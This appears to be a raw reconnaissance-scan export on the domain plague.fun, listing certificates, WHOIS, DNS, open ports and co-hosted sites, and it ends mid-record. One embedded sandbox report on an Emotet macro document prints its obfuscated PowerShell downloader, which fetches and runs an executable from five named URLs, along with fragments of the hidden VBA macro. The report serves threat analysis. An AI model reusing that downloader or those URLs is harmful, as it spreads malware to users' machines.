OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:69:96:28:2e:8d:11:23:d2:df:8d:af:0e:86:91: 07:54:3a:ad:81:0f:6e:0c:ed:ba:58:9b:a8:dd:0b:f6:9f:5b: b8:d1:0d:0f:20:8d:96:07:bf:17:bf:40:1d:05:de:64:02:31: 00:b6:70:a5:8a:80:f9:65:63:f5:4e:8a:9f:00:55:5b:1c:61: af:79:57:92:51:0e:76:a7:d1:43:e6:9b:64:5c:22:3d:99:f7: f9:9b:ac:52:3e:73:11:67:61:8b:92:50:c7 plague.fun 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Rock Chalk (Net ID: 00:01:95:08:D8:04) 37.780462,-122.390564 2022-12-18 00:03:18 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 04:a4:99:c7:6c:cb:8c:60:87:12:4d:ac:6d:aa:bc:48:46:46 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 4 17:47:44 2022 GMT Not After : Oct 2 17:47:43 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:ce:73:2c:c8:b3:db:26:51:e1:69:3c:75:92:d7: ab:cf:10:67:fe:05:65:9a:30:2d:7c:2d:4e:bf:1e: 15:12:c0:09:9c:ee:72:a7:89:e2:dd:d3:84:6a:4b: 52:9b:7c:3a:1c:0c:22:4c:2d:61:74:cf:f3:4e:65: 58:68:18:ae:42 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: EB:E4:FE:82:AF:4F:43:5A:7C:54:A8:CD:51:1C:E9:3D:A1:D3:59:44 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Jul 4 18:47:45.109 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:C6:AF:8E:EE:35:F5:BA:0F:D5:07:B3: CD:FF:DA:80:2E:52:74:BF:5E:FA:32:A4:C1:96:32:07: EA:B1:FD:8C:77:02:20:55:D1:FA:78:FD:7B:CF:6B:33: 09:31:34:F9:D7:15:91:7B:FC:85:A0:BD:11:DA:B6:DF: D8:B6:B1:A0:01:46:8D Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jul 4 18:47:45.115 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:03:7B:C2:27:5B:DD:A9:BD:2C:0B:34:D4: 4C:C0:99:D6:F8:68:DB:8E:2B:8F:22:CD:3C:A1:DA:BB: 18:DA:43:B7:02:20:3E:AD:F2:A8:58:09:D7:F4:A9:C4: 20:10:3F:08:D3:E9:2A:1F:C3:23:A3:54:CE:16:7A:71: EA:10:A7:26:76:16 Signature Algorithm: ecdsa-with-SHA384 30:65:02:30:6c:3f:69:03:1e:e0:cc:bd:a4:57:f4:5b:33:85: c6:e6:d6:1a:98:40:6f:a3:25:c6:8e:b9:e6:03:16:6c:f0:01: 0a:a0:bf:67:01:45:c9:17:13:93:a3:3c:a7:c1:25:c0:02:31: 00:df:d1:f3:29:0e:9b:f5:d2:37:66:1b:02:ce:6c:43:4a:4b: d3:83:d0:43:fd:ac:4d:1c:44:36:30:8c:63:36:5b:00:e9:58: 73:af:c7:7c:97:25:ae:bb:e5:28:3d:45:38 2022-12-18 00:32:13 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.top plague.fun 2022-12-18 00:09:45 Co-Hosted Site No HackerTarget 0 0 2 0 None anininfio.ml 172.67.147.230 2022-12-18 00:04:30 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'banker', u'emotet', u'macros-on-open'], u'crowdstrike_ai': None, u'total_processes': 6, u'threat_score': 100, u'compromised_hosts': [u'34.98.99.30', u'151.236.60.5', u'104.21.28.240', u'110.4.45.142'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'01292019_618370984.doc', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-70', u'name': u'Scanning for window names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1010', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1010', u'relevance': 10, u'threat_level': 0, u'type': 6, u'description': u'"WINWORD.EXE" searching for class "mspim_wnd32"\n "WINWORD.EXE" searching for class "MSOBALLOON"\n "WINWORD.EXE" searching for class "MsoHelp10"\n "WINWORD.EXE" searching for class "AgentAnim"'}, {u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-3', u'name': u'Loads the .NET runtime environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"powershell.exe" loaded module "%WINDIR%\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\0478aed7fc25ae268474c704fd2a3e0f\\mscorlib.ni.dll" at E3F00000'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-174', u'name': u'References url in command line', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 0, u'type': 9, u'description': u'Process "cmd.exe" with commandline "/S /D /c" echo pow%PUBLIC:~5\n1%r%SESSIONNAME:~-4\n1%h%TEMP:~-3\n1%ll $wqsiv=\'sjtozf\';$rczll=new-object Net.WebClient;$tzzsjb=\'http://miamifloridainvestigator.com/ErpKgzfU@http://korvital.com/4IAgICJ5@http://dolibarr.ph-prod.com/LIjJChqbe@http://pioneerhometution.com/5yC6663Mp@http://likino.com/bolOP1vO8\'.Split(\'@\');$vwiizu=\'wduip\';$zzmfvnw = \'732\';$lojcjdb=\'zuizl\';$jqjlnnr=$env:temp+\'\\\'+$zzmfvnw+\'.exe\';foreach($kjmpw in $tzzsjb){try{$rczll.DownloadFile($kjmpw, $jqjlnnr);$ibkzitw=\'otaapwz\';If ((Get-Item $jqjlnnr).length -ge 40000) {Invoke-Item $jqjlnnr;$dkwrisu=\'czwdmjd\';break;}}catch{}}$imssqz=\'jbvtwvj\';"" (UID: 00000000-00003092)\n Process "powershell.exe" with commandline "powershell $wqsiv=\'sjtozf\';$rczll=new-object Net.WebClient;$tzzsjb=\'http://miamifloridainvestigator.com/ErpKgzfU@http://korvital.com/4IAgICJ5@http://dolibarr.ph-prod.com/LIjJChqbe@http://pioneerhometution.com/5yC6663Mp@http://likino.com/bolOP1vO8\'.Split(\'@\');$vwiizu=\'wduip\';$zzmfvnw = \'732\';$lojcjdb=\'zuizl\';$jqjlnnr=$env:temp+\'\\\'+$zzmfvnw+\'.exe\';foreach($kjmpw in $tzzsjb){try{$rczll.DownloadFile($kjmpw, $jqjlnnr);$ibkzitw=\'otaapwz\';If ((Get-Item $jqjlnnr).length -ge 40000) {Invoke-Item $jqjlnnr;$dkwrisu=\'czwdmjd\';break;}}catch{}}$imssqz=\'jbvtwvj\';" (UID: 00000000-00002572)'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"WINWORD.EXE" touched "Shortcut" (Path: "HKCU\\CLSID\\{00021401-0000-0000-C000-000000000046}")\n "WINWORD.EXE" touched "Microsoft Word 97-2003-Dokument" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00020906-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "WINWORD.EXE" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "WINWORD.EXE" touched "Memory Mapped Cache Mgr" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}")\n "WINWORD.EXE" touched "SAX XML Reader 6.0" (Path: "HKCU\\CLSID\\{88D96A0C-F192-11D4-A65F-0040963251E5}\\TREATAS")\n "WINWORD.EXE" touched "MXXMLWriter 6.0" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{88D96A0F-F192-11D4-A65F-0040963251E5}\\INPROCSERVER32")\n "WINWORD.EXE" touched "OneNote Word Add-In Take Notes Content Service Class" (Path: "HKCU\\CLSID\\{C580A1B2-5915-4DC3-BE93-8A51F4CAB320}\\INPROCSERVER32")\n "WINWORD.EXE" touched "PersistentZoneIdentifier" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0968E258-16C7-4DBA-AA86-462DD61E31A3}\\PROGID")\n "WINWORD.EXE" touched "XML Schema Cache 6.0" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{88D96A07-F192-11D4-A65F-0040963251E5}\\TREATAS")\n "WINWORD.EXE" touched "Security Manager" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word-Vorlage mit Makros" (Path: "HKCU\\CLSID\\{8A624388-AA27-43E0-89F8-2A12BFF7BCCD}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}")\n "WINWORD.EXE" touched "Microsoft Word-Dokument" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{F4754C9B-64F5-4B40-8AF4-679732AC0607}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word-Dokument mit Makros" (Path: "HKCU\\CLSID\\{18A06B6B-2F3F-4E2B-A611-52BE631B2D22}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word-Vorlage" (Path: "HKCU\\CLSID\\{912ABC52-36E2-4714-8E62-A8B73CA5E390}\\INPROCHANDLER32")\n "WINWORD.EXE" touched "Microsoft Word-Vorschau" (Path: "HKCU\\CLSID\\{84F66100-FF7C-4FB4-B0C0-02CD7FB668FE}\\TREATAS")\n "WINWORD.EXE" touched "OpenDocument-Text" (Path: "HKCU\\CLSID\\{1B261B22-AC6A-4E68-A870-AB5080E8687B}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Word Picture" (Path: "HKCU\\CLSID\\{00020907-0000-0000-C000-000000000046}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Forms 2.1 FormPackage" (Path: "HKCU\\CLSID\\{AC9F2F90-E877-11CE-9F68-00AA00574A4F}\\TREATAS")\n "WINWORD.EXE" touched "Microsoft Forms 2.0 Form" (Path: "HKCU\\CLSID\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\MISCSTATUS")\n "WINWORD.EXE" touched "Microsoft Forms 2.1 DataObject" (Path: "HKCU\\CLSID\\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\\CONTROL")'}, {u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-13', u'name': u'Contains embedded VBA macros', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1204', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1204', u'relevance': 10, u'threat_level': 0, u'type': 0, u'description': u'File "dnfkdwl.cls" (Streampath: "VBA/dnfkdwl") has code: ""\n File "jwrhja.bas" (Streampath: "VBA/jwrhja") has code: "Function jvnzrf(htwpzwn)\nOn Error Resume Next\n Set mvdzl = cnnujfm\n If bfjidj <= 984169147 Then\n jnpiu = shozs * Sin(lhnofa) - zoczfl - CInt(dvductf + Rnd(750288296) + 733282163 + CDbl(270598878))\n wwbrso = 901182209\nEnd If\n Set rupbwr = ubrrom\n If lrbviwt <= 247806007 Then\n jrila = blbbpaz * Sin(mimbfz) - frzrju - CInt(zwlmhi + Rnd(30319884) + 550356392 + CDbl(772917406))\n wqvqi = 878982855\nEnd If\n Set caiuw = mtnmous\n If fzcal <= 424122488 Then\n wjzsvt = ojcqin * Sin(jrkot) - cvjztkw - CInt(oswpacr + Rnd(9801994) + 755224579 + CDbl(922669759))\n qtzsku = 795259790\nEnd If\njvnzrf = jvnzrf(Shell(htwpzwn, vbHide))\n Set lihlvtc = tviil\n If ndrdk <= 898898037 Then\n mntzn = incjrda * Sin(wpnwh) - bwciv - CInt(inmjzh + Rnd(978309681) + 123674700 + CDbl(949248428))\n rufcfdm = 341333385\nEnd If\n Set zwiuiak = hrurauv\n If uafuums <= 510973469 Then\n mpjkt = nbkwz * Sin(cdhdv) - acsijo - CInt(vcvrj + Rnd(425700337) + 205679951 + CDbl(20902840))\n owhtm = 50944742\nEnd If\n Set lwfjc = cpnskl\n If mzfrmij <= 577115389 Then\n dfnozlr = kpzvlhd * Sin(jpqcl) - qfpozf - CInt(pzrcn + Rnd(675046568) + 71254862 + CDbl(32066302))\n lboiukj = 921174495\nEnd If\nEnd Function\n\nFunction qkdluw()\nOn Error Resume Next\nSet zdcpwns = juvqz\n If jjllf <= 288438056 Then\n bdcmw = jnsjsui * Sin(midciz) - jcwidi - CInt(hznvkjh + Rnd(211582886) + 699380710 + CDbl(409996312))\n rdkwtcz = 19880776\nEnd If\n Set dwdtdf = ozzdi\n If fwmawsk <= 28739917 Then\n lwbpm = lcuqwp * Sin(dwuwww) - owjkdtw - CInt(zmrijnb + Rnd(636363874) + 287534293 + CDbl(707071004))\n iihzru = 771232272\nEnd If\n Set iraiw = jwncbhm\n If iwzjahr <= 918261739 Then\n mucldwi = uwtju * Sin(outunjs) - jmidzz - CInt(wmzdmkd + Rnd(874226755) + 488467751 + CDbl(260432624))\n ksfjfsw = 155159090\nEnd If\nbuvtm = "c:\\" + "ikadf" + "\\jsp" + "twzm\\n" + "njrbn"\nSet qcfis = wduaail\n If bfbaovj <= 334621417 Then\n nrkacb = aplsd * Sin(cfpzkff) - wfdpsu - CInt(uhramds + Rnd(941642071) + 718154558 + CDbl(235178107))\n mjbij = 461392357\nEnd If\n Set hnvnt = jmirqt\n If cbpcit <= 680592914 Then\n ccwrcqf = wnvkq * Sin(kvzua) - zptcu - CInt(mpwzl + Rnd(641556529) + 471091423 + CDbl(671754199))\n ckowpor = 415874602\nEnd If\nzuvwtbb = "\\..\\.." + "\\..\\w" + "ind" + "ows\\" + "system" + "32\\c"\nSet izzsz = utiudzo\n If ddzub <= 658807120 Then\n smwmhf = dwqsrr * Sin(lzfksn) - qdjziz - CInt(wjanij + Rnd(480032545) + 523859952 + CDbl(892641091))\n zwwol = 517232310\nEnd If\n Set cdukcht = rscsc\n If dbrwuld <= 822503878 Then\n pcadz = srmczz * Sin(lfqdp) - trjhcd - CInt(azausr + Rnd(724727335) + 959717756 + CDbl(751954319))\n zkcwdi = 427059424\nEnd If\n Set quibwh = pmtuiso\n If zdtpzv <= 812322959 Then\n ijftw = paawbub * Sin(zulzjp) - qiwru - CInt(jsvcjuw + Rnd(637606491) + 646801169 + CDbl(928496469))\n nwlfcni = 69285864\nEnd If\nrpnzcn = "md.exe" + " /c " + "%Pr" + "ogram" + "Data:" + "~0\n" + "1%%Pr" + "ogr" + "amData"\nSet zkmzis = bukjuh\n If hcozbd <= 892525818 Then\n bocjziw = vswuo * Sin(ramtj) - ufbtdho - CInt(widiaj + Rnd(60827869) + 440519123 + CDbl(549515986))\n liknnz = 595594226\nEnd If\n Set iadli = krwal\n If jjnpmk <= 132110158 Then\n ocoivi = jzhmn * Sin(jjmriav) - ttniwjw - CInt(lojup + Rnd(332257574) + 248510662 + CDbl(287255140))\n mowwjs = 220473018\nEnd If\ntosirp = ":~9\n" + "2% /" + "V:ON/C" + Chr(34) + "set " + "cGY=" + "T-Ksj" + ".O:S m" + "bMD~w" + "Uoyh("\nSet zbjmwi = kuinhz\n 104.21.28.240 2022-12-18 00:21:17 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b2d44e1e0c226d-ORD 188.114.96.1 2022-12-18 00:21:20 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T16:59:24.849Z", "ip": "188.114.97.1", "location_updated_at": "2022-12-14T09:57:27.738993Z", "autonomous_system_updated_at": "2022-12-14T09:57:27.793788Z", "location": {"province": "North Holland", "city": "Amsterdam", "country": "Netherlands", "coordinates": {"latitude": 52.3759, "longitude": 4.8975}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "1012", "country_code": "NL", "timezone": "Europe/Amsterdam", "continent": "Europe"}, "dns": {"records": {"clinic.tanyar.org": {"record_type": "A", "resolved_at": "2022-11-26T16:50:32.874480339Z"}, "landing.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-15T13:31:47.102980654Z"}, "barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-11-07T14:46:42.708236475Z"}, "www.barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-14T14:46:07.712552308Z"}, "www.clinic.tanyar.org": {"record_type": "A", "resolved_at": "2022-12-11T16:38:30.519896601Z"}, "stafferty.lt": {"record_type": "A", "resolved_at": "2022-11-13T15:02:07.210831297Z"}, "total-ev-charge.com": {"record_type": "A", "resolved_at": "2022-12-15T14:10:37.643603413Z"}, "stafferty.lv": {"record_type": "A", "resolved_at": "2022-11-12T15:01:01.637935320Z"}, "question-orthographe.net": {"record_type": "A", "resolved_at": "2022-11-24T15:56:30.103157098Z"}, "edu.rabinia.com": {"record_type": "A", "resolved_at": "2022-10-25T13:57:12.441109542Z"}, "mail.mardinscarf.com": {"record_type": "A", "resolved_at": "2022-11-01T13:38:25.278618273Z"}, "www.alvandcenter.com": {"record_type": "A", "resolved_at": "2022-11-07T12:46:16.283141371Z"}, "www.les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-12T13:36:36.298008873Z"}, "en.jahanbaygan.com": {"record_type": "A", "resolved_at": "2022-12-02T13:39:13.675188752Z"}, "megafrica.ao": {"record_type": "A", "resolved_at": "2022-10-02T12:04:18.005028285Z"}, "ftp.baharelm.ir": {"record_type": "A", "resolved_at": "2022-12-10T14:42:29.167562533Z"}, "dl.jamalghamari.com": {"record_type": "A", "resolved_at": "2022-12-09T13:31:11.160975798Z"}, "pop.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-18T13:44:12.923874025Z"}, "api.snoor.shop": {"record_type": "A", "resolved_at": "2022-11-22T01:28:36.076229399Z"}, "www.shop.charkhak.ir": {"record_type": "A", "resolved_at": "2022-10-14T15:11:46.056786726Z"}, "www.irancamping.com": {"record_type": "A", "resolved_at": "2022-10-13T13:47:56.298914617Z"}, "emberstreet.rocks": {"record_type": "A", "resolved_at": "2022-12-14T09:10:28.120965319Z"}, "barbecuemasters.dk": {"record_type": "A", "resolved_at": "2022-10-15T14:22:57.320001219Z"}, "www.sanayepishro.com": {"record_type": "A", "resolved_at": "2022-10-23T11:24:26.165823422Z"}, "smtp.sharoshop.com": {"record_type": "A", "resolved_at": "2022-10-23T14:06:43.660097027Z"}, "www.barbecue-masters.dk": {"record_type": "A", "resolved_at": "2022-10-10T14:59:00.508858938Z"}, "mail.bokharsanat.com": {"record_type": "A", "resolved_at": "2022-12-04T13:09:58.172835970Z"}, "irancamping.com": {"record_type": "A", "resolved_at": "2022-10-07T10:43:58.475530009Z"}, "les1000volets.com": {"record_type": "A", "resolved_at": "2022-10-11T03:19:20.280901310Z"}, "beautybeyondhair.buzz": {"record_type": "A", "resolved_at": "2022-11-20T12:28:51.523273907Z"}, "www.oxinpc.ir": {"record_type": "A", "resolved_at": "2022-10-09T15:06:46.974209710Z"}, "centrumpedikury.sk": {"record_type": "A", "resolved_at": "2022-10-02T16:33:19.851015297Z"}, "uncoveryourconfidence.org": {"record_type": "A", "resolved_at": "2022-11-23T20:29:39.482548225Z"}, "mail.lskala.com": {"record_type": "A", "resolved_at": "2022-12-16T13:31:07.910550851Z"}, "compete.pics": {"record_type": "A", "resolved_at": "2022-12-02T17:07:09.124392306Z"}, "mail.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-30T17:30:49.591604261Z"}, "assistant.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-11-15T19:04:22.316842630Z"}, "beautybeyondhair.net": {"record_type": "A", "resolved_at": "2022-11-30T15:41:49.088773411Z"}, "ftp.netrobotic.ir": {"record_type": "A", "resolved_at": "2022-12-13T15:24:16.343558814Z"}, "faryabkhabar.ir": {"record_type": "A", "resolved_at": "2022-11-13T14:44:04.633074370Z"}, "demo.jamalghamari.com": {"record_type": "A", "resolved_at": "2022-12-11T13:54:10.566859411Z"}, "lt.makingprojec.com": {"record_type": "A", "resolved_at": "2022-10-24T13:34:44.275517531Z"}, "mybots.amirhsvip.ir": {"record_type": "A", "resolved_at": "2022-12-02T15:15:41.628857633Z"}, "e-rundev.ir": {"record_type": "A", "resolved_at": "2022-11-28T15:05:14.014491568Z"}, "www.wolny.poker": {"record_type": "A", "resolved_at": "2022-10-16T17:06:44.448663582Z"}, "ritta.app": {"record_type": "A", "resolved_at": "2022-11-17T12:04:42.803798834Z"}, "wolny.poker": {"record_type": "A", "resolved_at": "2022-10-23T17:07:04.797789596Z"}}, "names": ["www.clinic.tanyar.org", "demo.jamalghamari.com", "beautybeyondhair.buzz", "api.snoor.shop", "mail.mardinscarf.com", "mail.lskala.com", "assistant.amirhsvip.ir", "www.sanayepishro.com", "mail.wolny.poker", "compete.pics", "pop.makingprojec.com", "en.jahanbaygan.com", "les1000volets.com", "megafrica.ao", "www.oxinpc.ir", "emberstreet.rocks", "total-ev-charge.com", "dl.jamalghamari.com", "lt.makingprojec.com", "irancamping.com", "stafferty.lv", "www.wolny.poker", "barbecue-masters.dk", "stafferty.lt", "www.shop.charkhak.ir", "barbecuemasters.dk", "question-orthographe.net", "smtp.sharoshop.com", "ftp.netrobotic.ir", "edu.rabinia.com", "ritta.app", "ftp.baharelm.ir", "landing.makingprojec.com", "www.irancamping.com", "wolny.poker", "e-rundev.ir", "beautybeyondhair.net", "uncoveryourconfidence.org", "mybots.amirhsvip.ir", "www.les1000volets.com", "faryabkhabar.ir", "centrumpedikury.sk", "www.barbecue-masters.dk", "www.barbecuemasters.dk", "clinic.tanyar.org", "www.alvandcenter.com", "mail.bokharsanat.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://188.114.97.1/"}, "response": {"body": "\n\n\n\n \n\nDirect IP access not allowed | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

\n Error\n 1003\n

\n Ray ID: 77b12f173862f22a •\n 2022-12-17 16:55:00 UTC\n

Direct IP access not allowed

\n
\n\n
\n
\n

What happened?

\n

You've requested an IP address that is part of the Cloudflare network. A valid Host header must be supplied to reach the desired website.

\n \n
\n\n \n
\n

What can I do?

\n

If you are interested in learning more about Cloudflare, please visit our website.

\n
\n \n
\n\n
>> Last update of WHOIS database: 2022-12-18T00:02:49.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.fun Registry Domain ID: D268611982-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-12-05T18:48:20.00Z Creation Date: 2022-01-08T12:59:00.00Z Registrar Registration Expiration Date: 2023-01-08T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: serverHold https://www.icann.org/epp#serverHold Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Alpes-Maritimes Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/177ad87c-41f0-4b87-926f-459f450a86e9 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: GARRETT.NS.CLOUDFLARE.COM Name Server: JOURNEY.NS.CLOUDFLARE.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTPS://ICANN.ORG/WICF >>> Last update of WHOIS database: 2022-12-18T00:02:49.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:18:03 Web Technology No Tool - WhatWeb 0 0 2 0 None JQuery webmail.zerotwo-best-waifu.online 2022-12-18 00:21:09 Open TCP Port No Censys 0 0 2 0 None 188.114.96.0:2082 188.114.96.0 2022-12-18 00:12:42 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 104.21.27.242 2022-12-18 00:06:06 Similar Domain Yes Tool - DNSTwist 1 0 1 0 None raspu.tain.fr rasputain.fr 2022-12-18 00:09:32 Co-Hosted Site No HackerTarget 0 0 2 0 None cogigang.com 104.21.28.240 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None turbofeistyintelligence.provhvfvqqho.repl.co 34.149.204.188 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 188.114.97.9 2022-12-18 00:23:32 Affiliate - Internet Name No DNS Raw Records 1 0 2 0 None smtp-fr.securemail.pro smtp.zerotwo-best-waifu.online 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.19.243 2022-12-18 00:32:28 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: plague.tools Registry Domain ID: ecc23f6039fd437480662da9344894d6-DONUTS Registrar WHOIS Server: whois.namecheap.com Registrar URL: https://www.namecheap.com/ Updated 